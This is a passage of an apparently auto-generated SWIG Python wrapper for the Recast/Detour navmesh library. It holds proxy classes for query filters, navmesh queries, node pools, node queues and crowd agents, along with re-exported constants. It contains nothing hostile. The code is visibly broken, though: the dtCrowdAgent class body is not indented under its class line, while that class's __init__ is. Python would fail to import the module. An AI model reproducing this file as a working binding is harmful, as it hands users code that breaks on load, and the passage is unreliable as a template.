    __setattr__ = lambda self, name, value: _swig_setattr(self, dtQueryFilter, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtQueryFilter, name)
    __repr__ = _swig_repr
    def __init__(self):
        # Allocate the underlying C object and bind its pointer to this proxy.
        this = _pyrecast.new_dtQueryFilter()
        # SWIG idiom (generator-emitted bare except kept byte-for-byte).
        try: self.this.append(this)
        except: self.this = this
    def passFilter(self, *args): return _pyrecast.dtQueryFilter_passFilter(self, *args)
    def getCost(self, *args): return _pyrecast.dtQueryFilter_getCost(self, *args)
    def getAreaCost(self, *args): return _pyrecast.dtQueryFilter_getAreaCost(self, *args)
    def setAreaCost(self, *args): return _pyrecast.dtQueryFilter_setAreaCost(self, *args)
    def getIncludeFlags(self): return _pyrecast.dtQueryFilter_getIncludeFlags(self)
    def setIncludeFlags(self, *args): return _pyrecast.dtQueryFilter_setIncludeFlags(self, *args)
    def getExcludeFlags(self): return _pyrecast.dtQueryFilter_getExcludeFlags(self)
    def setExcludeFlags(self, *args): return _pyrecast.dtQueryFilter_setExcludeFlags(self, *args)
    __swig_destroy__ = _pyrecast.delete_dtQueryFilter
    __del__ = lambda self : None;
# Register with the SWIG runtime so C-side pointers wrap into this class.
dtQueryFilter_swigregister = _pyrecast.dtQueryFilter_swigregister
dtQueryFilter_swigregister(dtQueryFilter)
# SWIG proxy for the C++ class dtNavMeshQuery (Detour's navmesh query object:
# pathfinding, raycasts, nearest-poly lookups).  Every method is a thin
# forwarder to the matching flat C wrapper in _pyrecast; argument and return
# conventions follow the Detour C++ API.
class dtNavMeshQuery(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtNavMeshQuery, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtNavMeshQuery, name)
    __repr__ = _swig_repr
    def __init__(self):
        # Allocate the underlying C object and bind its pointer to this proxy.
        this = _pyrecast.new_dtNavMeshQuery()
        # SWIG idiom (generator-emitted bare except kept byte-for-byte).
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtNavMeshQuery
    __del__ = lambda self : None;
    # Must be init()-ed against a navmesh before use (Detour convention).
    def init(self, *args): return _pyrecast.dtNavMeshQuery_init(self, *args)
    def findPath(self, *args): return _pyrecast.dtNavMeshQuery_findPath(self, *args)
    def findStraightPath(self, *args): return _pyrecast.dtNavMeshQuery_findStraightPath(self, *args)
    # Sliced (incremental) pathfinding: init / update / finalize.
    def initSlicedFindPath(self, *args): return _pyrecast.dtNavMeshQuery_initSlicedFindPath(self, *args)
    def updateSlicedFindPath(self, *args): return _pyrecast.dtNavMeshQuery_updateSlicedFindPath(self, *args)
    def finalizeSlicedFindPath(self, *args): return _pyrecast.dtNavMeshQuery_finalizeSlicedFindPath(self, *args)
    def finalizeSlicedFindPathPartial(self, *args): return _pyrecast.dtNavMeshQuery_finalizeSlicedFindPathPartial(self, *args)
    def findPolysAroundCircle(self, *args): return _pyrecast.dtNavMeshQuery_findPolysAroundCircle(self, *args)
    def findPolysAroundShape(self, *args): return _pyrecast.dtNavMeshQuery_findPolysAroundShape(self, *args)
    def findNearestPoly(self, *args): return _pyrecast.dtNavMeshQuery_findNearestPoly(self, *args)
    def queryPolygons(self, *args): return _pyrecast.dtNavMeshQuery_queryPolygons(self, *args)
    def findLocalNeighbourhood(self, *args): return _pyrecast.dtNavMeshQuery_findLocalNeighbourhood(self, *args)
    def moveAlongSurface(self, *args): return _pyrecast.dtNavMeshQuery_moveAlongSurface(self, *args)
    def raycast(self, *args): return _pyrecast.dtNavMeshQuery_raycast(self, *args)
    def findDistanceToWall(self, *args): return _pyrecast.dtNavMeshQuery_findDistanceToWall(self, *args)
    def getPolyWallSegments(self, *args): return _pyrecast.dtNavMeshQuery_getPolyWallSegments(self, *args)
    def findRandomPoint(self, *args): return _pyrecast.dtNavMeshQuery_findRandomPoint(self, *args)
    def findRandomPointAroundCircle(self, *args): return _pyrecast.dtNavMeshQuery_findRandomPointAroundCircle(self, *args)
    def closestPointOnPoly(self, *args): return _pyrecast.dtNavMeshQuery_closestPointOnPoly(self, *args)
    def closestPointOnPolyBoundary(self, *args): return _pyrecast.dtNavMeshQuery_closestPointOnPolyBoundary(self, *args)
    def getPolyHeight(self, *args): return _pyrecast.dtNavMeshQuery_getPolyHeight(self, *args)
    def isValidPolyRef(self, *args): return _pyrecast.dtNavMeshQuery_isValidPolyRef(self, *args)
    def isInClosedList(self, *args): return _pyrecast.dtNavMeshQuery_isInClosedList(self, *args)
    def getNodePool(self): return _pyrecast.dtNavMeshQuery_getNodePool(self)
    def getAttachedNavMesh(self): return _pyrecast.dtNavMeshQuery_getAttachedNavMesh(self)
# Register with the SWIG runtime so C-side pointers wrap into this class.
dtNavMeshQuery_swigregister = _pyrecast.dtNavMeshQuery_swigregister
dtNavMeshQuery_swigregister(dtNavMeshQuery)
def dtAllocNavMeshQuery():
    """Proxy for _pyrecast.dtAllocNavMeshQuery (allocate a query object)."""
    return _pyrecast.dtAllocNavMeshQuery()
# SWIG fast-path pattern: shadow the shim with the raw C function.
dtAllocNavMeshQuery = _pyrecast.dtAllocNavMeshQuery
def dtFreeNavMeshQuery(*args):
    """Proxy for _pyrecast.dtFreeNavMeshQuery (release a query object)."""
    return _pyrecast.dtFreeNavMeshQuery(*args)
# SWIG fast-path pattern: shadow the shim with the raw C function.
dtFreeNavMeshQuery = _pyrecast.dtFreeNavMeshQuery
# Search-node state flags re-exported from the C extension (presumably the
# values stored in dtNode.flags -- confirm against the Detour headers).
DT_NODE_OPEN = _pyrecast.DT_NODE_OPEN
DT_NODE_CLOSED = _pyrecast.DT_NODE_CLOSED
# SWIG proxy for the C++ struct dtNode, a single entry in Detour's A*-style
# search node pool (position, accumulated cost, total estimate, parent index,
# state flags, polygon ref id).
class dtNode(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtNode, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtNode, name)
    __repr__ = _swig_repr
    # Struct fields exposed via the SWIG getter/setter tables (and as
    # properties when _newclass is true).
    __swig_setmethods__["pos"] = _pyrecast.dtNode_pos_set
    __swig_getmethods__["pos"] = _pyrecast.dtNode_pos_get
    if _newclass:pos = _swig_property(_pyrecast.dtNode_pos_get, _pyrecast.dtNode_pos_set)
    __swig_setmethods__["cost"] = _pyrecast.dtNode_cost_set
    __swig_getmethods__["cost"] = _pyrecast.dtNode_cost_get
    if _newclass:cost = _swig_property(_pyrecast.dtNode_cost_get, _pyrecast.dtNode_cost_set)
    __swig_setmethods__["total"] = _pyrecast.dtNode_total_set
    __swig_getmethods__["total"] = _pyrecast.dtNode_total_get
    if _newclass:total = _swig_property(_pyrecast.dtNode_total_get, _pyrecast.dtNode_total_set)
    __swig_setmethods__["pidx"] = _pyrecast.dtNode_pidx_set
    __swig_getmethods__["pidx"] = _pyrecast.dtNode_pidx_get
    if _newclass:pidx = _swig_property(_pyrecast.dtNode_pidx_get, _pyrecast.dtNode_pidx_set)
    __swig_setmethods__["flags"] = _pyrecast.dtNode_flags_set
    __swig_getmethods__["flags"] = _pyrecast.dtNode_flags_get
    if _newclass:flags = _swig_property(_pyrecast.dtNode_flags_get, _pyrecast.dtNode_flags_set)
    __swig_setmethods__["id"] = _pyrecast.dtNode_id_set
    __swig_getmethods__["id"] = _pyrecast.dtNode_id_get
    if _newclass:id = _swig_property(_pyrecast.dtNode_id_get, _pyrecast.dtNode_id_set)
    def __init__(self):
        # Allocate the underlying C struct and bind its pointer to this proxy.
        this = _pyrecast.new_dtNode()
        # SWIG idiom (generator-emitted bare except kept byte-for-byte).
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtNode
    __del__ = lambda self : None;
# Register with the SWIG runtime so C-side pointers wrap into this class.
dtNode_swigregister = _pyrecast.dtNode_swigregister
dtNode_swigregister(dtNode)
# Sentinel "no node" index, re-exported from the C global-variable table.
DT_NULL_IDX = cvar.DT_NULL_IDX
# SWIG proxy for the C++ class dtNodePool: the pool/hash table of dtNode
# entries used by navmesh queries.  All methods forward to _pyrecast.
class dtNodePool(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtNodePool, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtNodePool, name)
    __repr__ = _swig_repr
    def __init__(self, *args):
        # *args are forwarded to the C++ constructor (parameters not visible
        # here -- see the Detour dtNodePool declaration).
        this = _pyrecast.new_dtNodePool(*args)
        # SWIG idiom (generator-emitted bare except kept byte-for-byte).
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtNodePool
    __del__ = lambda self : None;
    def clear(self): return _pyrecast.dtNodePool_clear(self)
    def getNode(self, *args): return _pyrecast.dtNodePool_getNode(self, *args)
    def findNode(self, *args): return _pyrecast.dtNodePool_findNode(self, *args)
    # Node <-> pool-index conversions.
    def getNodeIdx(self, *args): return _pyrecast.dtNodePool_getNodeIdx(self, *args)
    def getNodeAtIdx(self, *args): return _pyrecast.dtNodePool_getNodeAtIdx(self, *args)
    def getMemUsed(self): return _pyrecast.dtNodePool_getMemUsed(self)
    def getMaxNodes(self): return _pyrecast.dtNodePool_getMaxNodes(self)
    def getHashSize(self): return _pyrecast.dtNodePool_getHashSize(self)
    def getFirst(self, *args): return _pyrecast.dtNodePool_getFirst(self, *args)
    def getNext(self, *args): return _pyrecast.dtNodePool_getNext(self, *args)
# Register with the SWIG runtime so C-side pointers wrap into this class.
dtNodePool_swigregister = _pyrecast.dtNodePool_swigregister
dtNodePool_swigregister(dtNodePool)
# SWIG proxy for the C++ class dtNodeQueue: priority-queue interface
# (top/pop/push/modify) over search nodes, used by the query's open list.
class dtNodeQueue(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtNodeQueue, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtNodeQueue, name)
    __repr__ = _swig_repr
    def __init__(self, *args):
        # *args are forwarded to the C++ constructor (parameters not visible
        # here -- see the Detour dtNodeQueue declaration).
        this = _pyrecast.new_dtNodeQueue(*args)
        # SWIG idiom (generator-emitted bare except kept byte-for-byte).
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtNodeQueue
    __del__ = lambda self : None;
    def clear(self): return _pyrecast.dtNodeQueue_clear(self)
    def top(self): return _pyrecast.dtNodeQueue_top(self)
    def pop(self): return _pyrecast.dtNodeQueue_pop(self)
    def push(self, *args): return _pyrecast.dtNodeQueue_push(self, *args)
    def modify(self, *args): return _pyrecast.dtNodeQueue_modify(self, *args)
    def empty(self): return _pyrecast.dtNodeQueue_empty(self)
    def getMemUsed(self): return _pyrecast.dtNodeQueue_getMemUsed(self)
    def getCapacity(self): return _pyrecast.dtNodeQueue_getCapacity(self)
# Register with the SWIG runtime so C-side pointers wrap into this class.
dtNodeQueue_swigregister = _pyrecast.dtNodeQueue_swigregister
dtNodeQueue_swigregister(dtNodeQueue)
# SWIG proxy for the C++ struct dtCrowdNeighbour: a neighbouring crowd agent
# reference (agent index `idx` and distance `dist`).
class dtCrowdNeighbour(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdNeighbour, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtCrowdNeighbour, name)
    __repr__ = _swig_repr
    __swig_setmethods__["idx"] = _pyrecast.dtCrowdNeighbour_idx_set
    __swig_getmethods__["idx"] = _pyrecast.dtCrowdNeighbour_idx_get
    if _newclass:idx = _swig_property(_pyrecast.dtCrowdNeighbour_idx_get, _pyrecast.dtCrowdNeighbour_idx_set)
    __swig_setmethods__["dist"] = _pyrecast.dtCrowdNeighbour_dist_set
    __swig_getmethods__["dist"] = _pyrecast.dtCrowdNeighbour_dist_get
    if _newclass:dist = _swig_property(_pyrecast.dtCrowdNeighbour_dist_get, _pyrecast.dtCrowdNeighbour_dist_set)
    def __init__(self):
        # Allocate the underlying C struct and bind its pointer to this proxy.
        this = _pyrecast.new_dtCrowdNeighbour()
        # SWIG idiom (generator-emitted bare except kept byte-for-byte).
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtCrowdNeighbour
    __del__ = lambda self : None;
# Register with the SWIG runtime so C-side pointers wrap into this class.
dtCrowdNeighbour_swigregister = _pyrecast.dtCrowdNeighbour_swigregister
dtCrowdNeighbour_swigregister(dtCrowdNeighbour)
# Crowd capacity limits re-exported from the C global-variable table.
DT_CROWDAGENT_MAX_NEIGHBOURS = cvar.DT_CROWDAGENT_MAX_NEIGHBOURS
DT_CROWDAGENT_MAX_CORNERS = cvar.DT_CROWDAGENT_MAX_CORNERS
DT_CROWD_MAX_OBSTAVOIDANCE_PARAMS = cvar.DT_CROWD_MAX_OBSTAVOIDANCE_PARAMS
# Crowd-agent state enum values re-exported from the C extension.
DT_CROWDAGENT_STATE_INVALID = _pyrecast.DT_CROWDAGENT_STATE_INVALID
DT_CROWDAGENT_STATE_WALKING = _pyrecast.DT_CROWDAGENT_STATE_WALKING
DT_CROWDAGENT_STATE_OFFMESH = _pyrecast.DT_CROWDAGENT_STATE_OFFMESH
# SWIG proxy for the C++ struct dtCrowdAgentParams: per-agent configuration
# (size, speed/acceleration limits, query ranges, steering weights).
class dtCrowdAgentParams(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdAgentParams, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtCrowdAgentParams, name)
    __repr__ = _swig_repr
    # Struct fields exposed via the SWIG getter/setter tables (and as
    # properties when _newclass is true).
    __swig_setmethods__["radius"] = _pyrecast.dtCrowdAgentParams_radius_set
    __swig_getmethods__["radius"] = _pyrecast.dtCrowdAgentParams_radius_get
    if _newclass:radius = _swig_property(_pyrecast.dtCrowdAgentParams_radius_get, _pyrecast.dtCrowdAgentParams_radius_set)
    __swig_setmethods__["height"] = _pyrecast.dtCrowdAgentParams_height_set
    __swig_getmethods__["height"] = _pyrecast.dtCrowdAgentParams_height_get
    if _newclass:height = _swig_property(_pyrecast.dtCrowdAgentParams_height_get, _pyrecast.dtCrowdAgentParams_height_set)
    __swig_setmethods__["maxAcceleration"] = _pyrecast.dtCrowdAgentParams_maxAcceleration_set
    __swig_getmethods__["maxAcceleration"] = _pyrecast.dtCrowdAgentParams_maxAcceleration_get
    if _newclass:maxAcceleration = _swig_property(_pyrecast.dtCrowdAgentParams_maxAcceleration_get, _pyrecast.dtCrowdAgentParams_maxAcceleration_set)
    __swig_setmethods__["maxSpeed"] = _pyrecast.dtCrowdAgentParams_maxSpeed_set
    __swig_getmethods__["maxSpeed"] = _pyrecast.dtCrowdAgentParams_maxSpeed_get
    if _newclass:maxSpeed = _swig_property(_pyrecast.dtCrowdAgentParams_maxSpeed_get, _pyrecast.dtCrowdAgentParams_maxSpeed_set)
    __swig_setmethods__["collisionQueryRange"] = _pyrecast.dtCrowdAgentParams_collisionQueryRange_set
    __swig_getmethods__["collisionQueryRange"] = _pyrecast.dtCrowdAgentParams_collisionQueryRange_get
    if _newclass:collisionQueryRange = _swig_property(_pyrecast.dtCrowdAgentParams_collisionQueryRange_get, _pyrecast.dtCrowdAgentParams_collisionQueryRange_set)
    __swig_setmethods__["pathOptimizationRange"] = _pyrecast.dtCrowdAgentParams_pathOptimizationRange_set
    __swig_getmethods__["pathOptimizationRange"] = _pyrecast.dtCrowdAgentParams_pathOptimizationRange_get
    if _newclass:pathOptimizationRange = _swig_property(_pyrecast.dtCrowdAgentParams_pathOptimizationRange_get, _pyrecast.dtCrowdAgentParams_pathOptimizationRange_set)
    __swig_setmethods__["separationWeight"] = _pyrecast.dtCrowdAgentParams_separationWeight_set
    __swig_getmethods__["separationWeight"] = _pyrecast.dtCrowdAgentParams_separationWeight_get
    if _newclass:separationWeight = _swig_property(_pyrecast.dtCrowdAgentParams_separationWeight_get, _pyrecast.dtCrowdAgentParams_separationWeight_set)
    __swig_setmethods__["updateFlags"] = _pyrecast.dtCrowdAgentParams_updateFlags_set
    __swig_getmethods__["updateFlags"] = _pyrecast.dtCrowdAgentParams_updateFlags_get
    if _newclass:updateFlags = _swig_property(_pyrecast.dtCrowdAgentParams_updateFlags_get, _pyrecast.dtCrowdAgentParams_updateFlags_set)
    __swig_setmethods__["obstacleAvoidanceType"] = _pyrecast.dtCrowdAgentParams_obstacleAvoidanceType_set
    __swig_getmethods__["obstacleAvoidanceType"] = _pyrecast.dtCrowdAgentParams_obstacleAvoidanceType_get
    if _newclass:obstacleAvoidanceType = _swig_property(_pyrecast.dtCrowdAgentParams_obstacleAvoidanceType_get, _pyrecast.dtCrowdAgentParams_obstacleAvoidanceType_set)
    __swig_setmethods__["userData"] = _pyrecast.dtCrowdAgentParams_userData_set
    __swig_getmethods__["userData"] = _pyrecast.dtCrowdAgentParams_userData_get
    if _newclass:userData = _swig_property(_pyrecast.dtCrowdAgentParams_userData_get, _pyrecast.dtCrowdAgentParams_userData_set)
    def __init__(self):
        # Allocate the underlying C struct and bind its pointer to this proxy.
        this = _pyrecast.new_dtCrowdAgentParams()
        # SWIG idiom (generator-emitted bare except kept byte-for-byte).
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtCrowdAgentParams
    __del__ = lambda self : None;
# Register with the SWIG runtime so C-side pointers wrap into this class.
dtCrowdAgentParams_swigregister = _pyrecast.dtCrowdAgentParams_swigregister
dtCrowdAgentParams_swigregister(dtCrowdAgentParams)
DT_CROWDAGENT_TARGET_NONE = _pyrecast.DT_CROWDAGENT_TARGET_NONE
DT_CROWDAGENT_TARGET_FAILED = _pyrecast.DT_CROWDAGENT_TARGET_FAILED
DT_CROWDAGENT_TARGET_VALID = _pyrecast.DT_CROWDAGENT_TARGET_VALID
DT_CROWDAGENT_TARGET_REQUESTING = _pyrecast.DT_CROWDAGENT_TARGET_REQUESTING
DT_CROWDAGENT_TARGET_WAITING_FOR_QUEUE = _pyrecast.DT_CROWDAGENT_TARGET_WAITING_FOR_QUEUE
DT_CROWDAGENT_TARGET_WAITING_FOR_PATH = _pyrecast.DT_CROWDAGENT_TARGET_WAITING_FOR_PATH
DT_CROWDAGENT_TARGET_VELOCITY = _pyrecast.DT_CROWDAGENT_TARGET_VELOCITY
class dtCrowdAgent(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdAgent, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtCrowdAgent, name)
__repr__ = _swig_repr
__swig_setmethods__["active"] = _pyrecast.dtCrowdAgent_active_set
__swig_getmethods__["active"] = _pyrecast.dtCrowdAgent_active_get
if _newclass:active = _swig_property(_pyrecast.dtCrowdAgent_active_get, _pyrecast.dtCrowdAgent_active_set)
__swig_setmethods__["state"] = _pyrecast.dtCrowdAgent_state_set
__swig_getmethods__["state"] = _pyrecast.dtCrowdAgent_state_get
if _newclass:state = _swig_property(_pyrecast.dtCrowdAgent_state_get, _pyrecast.dtCrowdAgent_state_set)
__swig_setmethods__["corridor"] = _pyrecast.dtCrowdAgent_corridor_set
__swig_getmethods__["corridor"] = _pyrecast.dtCrowdAgent_corridor_get
if _newclass:corridor = _swig_property(_pyrecast.dtCrowdAgent_corridor_get, _pyrecast.dtCrowdAgent_corridor_set)
__swig_setmethods__["boundary"] = _pyrecast.dtCrowdAgent_boundary_set
__swig_getmethods__["boundary"] = _pyrecast.dtCrowdAgent_boundary_get
if _newclass:boundary = _swig_property(_pyrecast.dtCrowdAgent_boundary_get, _pyrecast.dtCrowdAgent_boundary_set)
__swig_setmethods__["topologyOptTime"] = _pyrecast.dtCrowdAgent_topologyOptTime_set
__swig_getmethods__["topologyOptTime"] = _pyrecast.dtCrowdAgent_topologyOptTime_get
if _newclass:topologyOptTime = _swig_property(_pyrecast.dtCrowdAgent_topologyOptTime_get, _pyrecast.dtCrowdAgent_topologyOptTime_set)
__swig_setmethods__["neis"] = _pyrecast.dtCrowdAgent_neis_set
__swig_getmethods__["neis"] = _pyrecast.dtCrowdAgent_neis_get
if _newclass:neis = _swig_property(_pyrecast.dtCrowdAgent_neis_get, _pyrecast.dtCrowdAgent_neis_set)
__swig_setmethods__["nneis"] = _pyrecast.dtCrowdAgent_nneis_set
__swig_getmethods__["nneis"] = _pyrecast.dtCrowdAgent_nneis_get
if _newclass:nneis = _swig_property(_pyrecast.dtCrowdAgent_nneis_get, _pyrecast.dtCrowdAgent_nneis_set)
__swig_setmethods__["desiredSpeed"] = _pyrecast.dtCrowdAgent_desiredSpeed_set
__swig_getmethods__["desiredSpeed"] = _pyrecast.dtCrowdAgent_desiredSpeed_get
if _newclass:desiredSpeed = _swig_property(_pyrecast.dtCrowdAgent_desiredSpeed_get, _pyrecast.dtCrowdAgent_desiredSpeed_set)
__swig_setmethods__["npos"] = _pyrecast.dtCrowdAgent_npos_set
__swig_getmethods__["npos"] = _pyrecast.dtCrowdAgent_npos_get
if _newclass:npos = _swig_property(_pyrecast.dtCrowdAgent_npos_get, _pyrecast.dtCrowdAgent_npos_set)
__swig_setmethods__["disp"] = _pyrecast.dtCrowdAgent_disp_set
__swig_getmethods__["disp"] = _pyrecast.dtCrowdAgent_disp_get
if _newclass:disp = _swig_property(_pyrecast.dtCrowdAgent_disp_get, _pyrecast.dtCrowdAgent_disp_set)
__swig_setmethods__["dvel"] = _pyrecast.dtCrowdAgent_dvel_set
__swig_getmethods__["dvel"] = _pyrecast.dtCrowdAgent_dvel_get
if _newclass:dvel = _swig_property(_pyrecast.dtCrowdAgent_dvel_get, _pyrecast.dtCrowdAgent_dvel_set)
__swig_setmethods__["nvel"] = _pyrecast.dtCrowdAgent_nvel_set
__swig_getmethods__["nvel"] = _pyrecast.dtCrowdAgent_nvel_get
if _newclass:nvel = _swig_property(_pyrecast.dtCrowdAgent_nvel_get, _pyrecast.dtCrowdAgent_nvel_set)
__swig_setmethods__["vel"] = _pyrecast.dtCrowdAgent_vel_set
__swig_getmethods__["vel"] = _pyrecast.dtCrowdAgent_vel_get
if _newclass:vel = _swig_property(_pyrecast.dtCrowdAgent_vel_get, _pyrecast.dtCrowdAgent_vel_set)
__swig_setmethods__["params"] = _pyrecast.dtCrowdAgent_params_set
__swig_getmethods__["params"] = _pyrecast.dtCrowdAgent_params_get
if _newclass:params = _swig_property(_pyrecast.dtCrowdAgent_params_get, _pyrecast.dtCrowdAgent_params_set)
__swig_setmethods__["cornerVerts"] = _pyrecast.dtCrowdAgent_cornerVerts_set
__swig_getmethods__["cornerVerts"] = _pyrecast.dtCrowdAgent_cornerVerts_get
if _newclass:cornerVerts = _swig_property(_pyrecast.dtCrowdAgent_cornerVerts_get, _pyrecast.dtCrowdAgent_cornerVerts_set)
__swig_setmethods__["cornerFlags"] = _pyrecast.dtCrowdAgent_cornerFlags_set
__swig_getmethods__["cornerFlags"] = _pyrecast.dtCrowdAgent_cornerFlags_get
if _newclass:cornerFlags = _swig_property(_pyrecast.dtCrowdAgent_cornerFlags_get, _pyrecast.dtCrowdAgent_cornerFlags_set)
__swig_setmethods__["cornerPolys"] = _pyrecast.dtCrowdAgent_cornerPolys_set
__swig_getmethods__["cornerPolys"] = _pyrecast.dtCrowdAgent_cornerPolys_get
if _newclass:cornerPolys = _swig_property(_pyrecast.dtCrowdAgent_cornerPolys_get, _pyrecast.dtCrowdAgent_cornerPolys_set)
__swig_setmethods__["ncorners"] = _pyrecast.dtCrowdAgent_ncorners_set
__swig_getmethods__["ncorners"] = _pyrecast.dtCrowdAgent_ncorners_get
if _newclass:ncorners = _swig_property(_pyrecast.dtCrowdAgent_ncorners_get, _pyrecast.dtCrowdAgent_ncorners_set)
__swig_setmethods__["targetState"] = _pyrecast.dtCrowdAgent_targetState_set
__swig_getmethods__["targetState"] = _pyrecast.dtCrowdAgent_targetState_get
if _newclass:targetState = _swig_property(_pyrecast.dtCrowdAgent_targetState_get, _pyrecast.dtCrowdAgent_targetState_set)
__swig_setmethods__["targetRef"] = _pyrecast.dtCrowdAgent_targetRef_set
__swig_getmethods__["targetRef"] = _pyrecast.dtCrowdAgent_targetRef_get
if _newclass:targetRef = _swig_property(_pyrecast.dtCrowdAgent_targetRef_get, _pyrecast.dtCrowdAgent_targetRef_set)
__swig_setmethods__["targetPos"] = _pyrecast.dtCrowdAgent_targetPos_set
__swig_getmethods__["targetPos"] = _pyrecast.dtCrowdAgent_targetPos_get
if _newclass:targetPos = _swig_property(_pyrecast.dtCrowdAgent_targetPos_get, _pyrecast.dtCrowdAgent_targetPos_set)
__swig_setmethods__["targetPathqRef"] = _pyrecast.dtCrowdAgent_targetPathqRef_set
__swig_getmethods__["targetPathqRef"] = _pyrecast.dtCrowdAgent_targetPathqRef_get
if _newclass:targetPathqRef = _swig_property(_pyrecast.dtCrowdAgent_targetPathqRef_get, _pyrecast.dtCrowdAgent_targetPathqRef_set)
__swig_setmethods__["targetReplan"] = _pyrecast.dtCrowdAgent_targetReplan_set
__swig_getmethods__["targetReplan"] = _pyrecast.dtCrowdAgent_targetReplan_get
if _newclass:targetReplan = _swig_property(_pyrecast.dtCrowdAgent_targetReplan_get, _pyrecast.dtCrowdAgent_targetReplan_set)
__swig_setmethods__["targetReplanTime"] = _pyrecast.dtCrowdAgent_targetReplanTime_set
__swig_getmethods__["targetReplanTime"] = _pyrecast.dtCrowdAgent_targetReplanTime_get
if _newclass:targetReplanTime = _swig_property(_pyrecast.dtCrowdAgent_targetReplanTime_get, _pyrecast.dtCrowdAgent_targetReplanTime_set)
    def __init__(self):
        """Construct the underlying C++ dtCrowdAgent and wrap it in this proxy."""
        this = _pyrecast.new_dtCrowdAgent()
        # SWIG ownership bookkeeping: append to an existing `this` list if the
        # proxy was already partially initialised, otherwise store it directly.
        try: self.this.append(this)
        except: self.this = this
    # SWIG destructor hooks: the C++ object is released via delete_dtCrowdAgent.
    __swig_destroy__ = _pyrecast.delete_dtCrowdAgent
    __del__ = lambda self : None;
# Register the proxy class with the SWIG runtime.
dtCrowdAgent_swigregister = _pyrecast.dtCrowdAgent_swigregister
dtCrowdAgent_swigregister(dtCrowdAgent)
class dtCrowdAgentAnimation(_object):
    """SWIG-generated proxy for the C++ struct ``dtCrowdAgentAnimation``.

    All attribute access is delegated to getter/setter functions in the
    ``_pyrecast`` extension module via the SWIG set/get method tables.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdAgentAnimation, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, dtCrowdAgentAnimation, name)
    __repr__ = _swig_repr
    __swig_setmethods__["active"] = _pyrecast.dtCrowdAgentAnimation_active_set
    __swig_getmethods__["active"] = _pyrecast.dtCrowdAgentAnimation_active_get
    if _newclass:active = _swig_property(_pyrecast.dtCrowdAgentAnimation_active_get, _pyrecast.dtCrowdAgentAnimation_active_set)
    __swig_setmethods__["initPos"] = _pyrecast.dtCrowdAgentAnimation_initPos_set
    __swig_getmethods__["initPos"] = _pyrecast.dtCrowdAgentAnimation_initPos_get
    if _newclass:initPos = _swig_property(_pyrecast.dtCrowdAgentAnimation_initPos_get, _pyrecast.dtCrowdAgentAnimation_initPos_set)
    __swig_setmethods__["startPos"] = _pyrecast.dtCrowdAgentAnimation_startPos_set
    __swig_getmethods__["startPos"] = _pyrecast.dtCrowdAgentAnimation_startPos_get
    if _newclass:startPos = _swig_property(_pyrecast.dtCrowdAgentAnimation_startPos_get, _pyrecast.dtCrowdAgentAnimation_startPos_set)
    __swig_setmethods__["endPos"] = _pyrecast.dtCrowdAgentAnimation_endPos_set
    __swig_getmethods__["endPos"] = _pyrecast.dtCrowdAgentAnimation_endPos_get
    if _newclass:endPos = _swig_property(_pyrecast.dtCrowdAgentAnimation_endPos_get, _pyrecast.dtCrowdAgentAnimation_endPos_set)
    __swig_setmethods__["polyRef"] = _pyrecast.dtCrowdAgentAnimation_polyRef_set
    __swig_getmethods__["polyRef"] = _pyrecast.dtCrowdAgentAnimation_polyRef_get
    if _newclass:polyRef = _swig_property(_pyrecast.dtCrowdAgentAnimation_polyRef_get, _pyrecast.dtCrowdAgentAnimation_polyRef_set)
    __swig_setmethods__["t"] = _pyrecast.dtCrowdAgentAnimation_t_set
    __swig_getmethods__["t"] = _pyrecast.dtCrowdAgentAnimation_t_get
    if _newclass:t = _swig_property(_pyrecast.dtCrowdAgentAnimation_t_get, _pyrecast.dtCrowdAgentAnimation_t_set)
    __swig_setmethods__["tmax"] = _pyrecast.dtCrowdAgentAnimation_tmax_set
    __swig_getmethods__["tmax"] = _pyrecast.dtCrowdAgentAnimation_tmax_get
    if _newclass:tmax = _swig_property(_pyrecast.dtCrowdAgentAnimation_tmax_get, _pyrecast.dtCrowdAgentAnimation_tmax_set)
    def __init__(self):
        """Construct the underlying C++ dtCrowdAgentAnimation."""
        this = _pyrecast.new_dtCrowdAgentAnimation()
        try: self.this.append(this)
        except: self.this = this
    __swig_destroy__ = _pyrecast.delete_dtCrowdAgentAnimation
    __del__ = lambda self : None;
dtCrowdAgentAnimation_swigregister = _pyrecast.dtCrowdAgentAnimation_swigregister
dtCrowdAgentAnimation_swigregister(dtCrowdAgentAnimation)
# Crowd update-flag constants re-exported from the _pyrecast extension module.
DT_CROWD_ANTICIPATE_TURNS = _pyrecast.DT_CROWD_ANTICIPATE_TURNS
